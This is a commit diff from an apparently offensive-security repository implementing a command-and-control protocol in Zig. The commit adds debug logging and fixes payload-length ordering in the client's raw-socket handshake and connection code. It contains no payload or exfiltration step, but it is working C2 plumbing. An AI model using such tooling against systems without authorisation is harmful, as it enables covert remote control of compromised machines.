zambyte.robbyzambito.me / zaprus
Adversarial C2 Protocol Implemented in Zig
0
fork

Configure Feed

Select the types of activity you want to include in your feed.

Fix checksum issue

Robby Zambito 157afa13 a81c4b31

+22 -1
+8
src/Client.zig
··· 95 95 }, 96 96 }; 97 97 98 + log.debug("Setting bpf filter to port {}", .{connection.connection.src}); 98 99 try self.socket.attachSaprusPortFilter(connection.connection.src); 100 + log.debug("bpf set", .{}); 99 101 100 102 var connection_buf: [2048]u8 = undefined; 101 103 var connection_bytes = connection.toBytes(&connection_buf); 102 104 headers.setPayloadLen(connection_bytes.len); 103 105 106 + log.debug("Building full message", .{}); 104 107 var full_msg = blk: { 105 108 var msg_buf: [2048]u8 = undefined; 106 109 var msg_w: Writer = .fixed(&msg_buf); ··· 108 111 msg_w.writeAll(connection_bytes) catch unreachable; 109 112 break :blk msg_w.buffered(); 110 113 }; 114 + log.debug("Built full message. Sending message", .{}); 111 115 112 116 try self.socket.send(full_msg); 113 117 var res_buf: [4096]u8 = undefined; 114 118 115 119 // Ignore response from sentinel, just accept that we got one. 120 + log.debug("Awaiting handshake response", .{}); 116 121 _ = try self.socket.receive(&res_buf); 117 122 try io.sleep(.fromMilliseconds(40), .real); 118 123 119 124 headers.udp.dst_port = udp_dest_port; 120 125 headers.ip.id = rand.int(u16); 126 + headers.setPayloadLen(connection_bytes.len); 121 127 128 + log.debug("Building final handshake message", .{}); 122 129 full_msg = blk: { 123 130 var msg_buf: [2048]u8 = undefined; 124 131 var msg_w: Writer = .fixed(&msg_buf); ··· 140 147 const std = @import("std"); 141 148 const Io = std.Io; 142 149 const Writer = std.Io.Writer; 150 + const log = std.log;
+11 -1
src/Connection.zig
··· 14 14 15 15 pub fn next(self: Connection, io: Io, buf: []u8) ![]const u8 { 16 16 _ = io; 17 + log.debug("Awaiting connection message", .{}); 17 18 const res = try self.socket.receive(buf); 19 + log.debug("Received {} byte connection message", .{res.len}); 18 20 const connection_res = blk: { 19 21 const msg: SaprusMessage = try .parse(res[42..]); 20 22 break :blk msg.connection; 21 23 }; 22 24 25 + log.debug("Payload was {s}", .{connection_res.payload}); 26 + 23 27 return connection_res.payload; 24 28 } 25 29 ··· 28 32 const io_source: std.Random.IoSource = .{ .io = io }; 29 33 break :blk io_source.interface(); 30 34 }; 35 + 36 + log.debug("Sending connection message", .{}); 31 37 32 38 self.connection.connection.payload = buf; 33 39 const connection_bytes = blk: { ··· 35 41 break :blk self.connection.toBytes(&connection_bytes); 36 42 }; 37 43 38 - self.headers.setPayloadLen(connection_bytes.len); 39 44 self.headers.ip.id = rand.int(u16); 45 + self.headers.setPayloadLen(connection_bytes.len); 40 46 41 47 const full_msg = blk: { 42 48 var msg_buf: [2048]u8 = undefined; ··· 47 53 }; 48 54 49 55 try self.socket.send(full_msg); 56 + 57 + log.debug("Sent {} byte connection message", .{full_msg.len}); 50 58 } 51 59 52 60 const std = @import("std"); 53 61 const Io = std.Io; 54 62 const Writer = std.Io.Writer; 63 + 64 + const log = std.log; 55 65 56 66 const SaprusMessage = @import("./message.zig").Message; 57 67
+3
src/main.zig
··· 100 100 101 101 if (flags.connect != null) { 102 102 reconnect: while (true) { 103 + log.debug("Starting connection", .{}); 103 104 var connection = try client.connect(init.io, flags.connect.?); 105 + log.debug("Connection started", .{}); 104 106 105 107 while (true) { 106 108 var res_buf: [2048]u8 = undefined; ··· 156 158 157 159 const builtin = @import("builtin"); 158 160 const std = @import("std"); 161 + const log = std.log; 159 162 const ArrayList = std.ArrayList; 160 163 const StaticStringMap = std.StaticStringMap; 161 164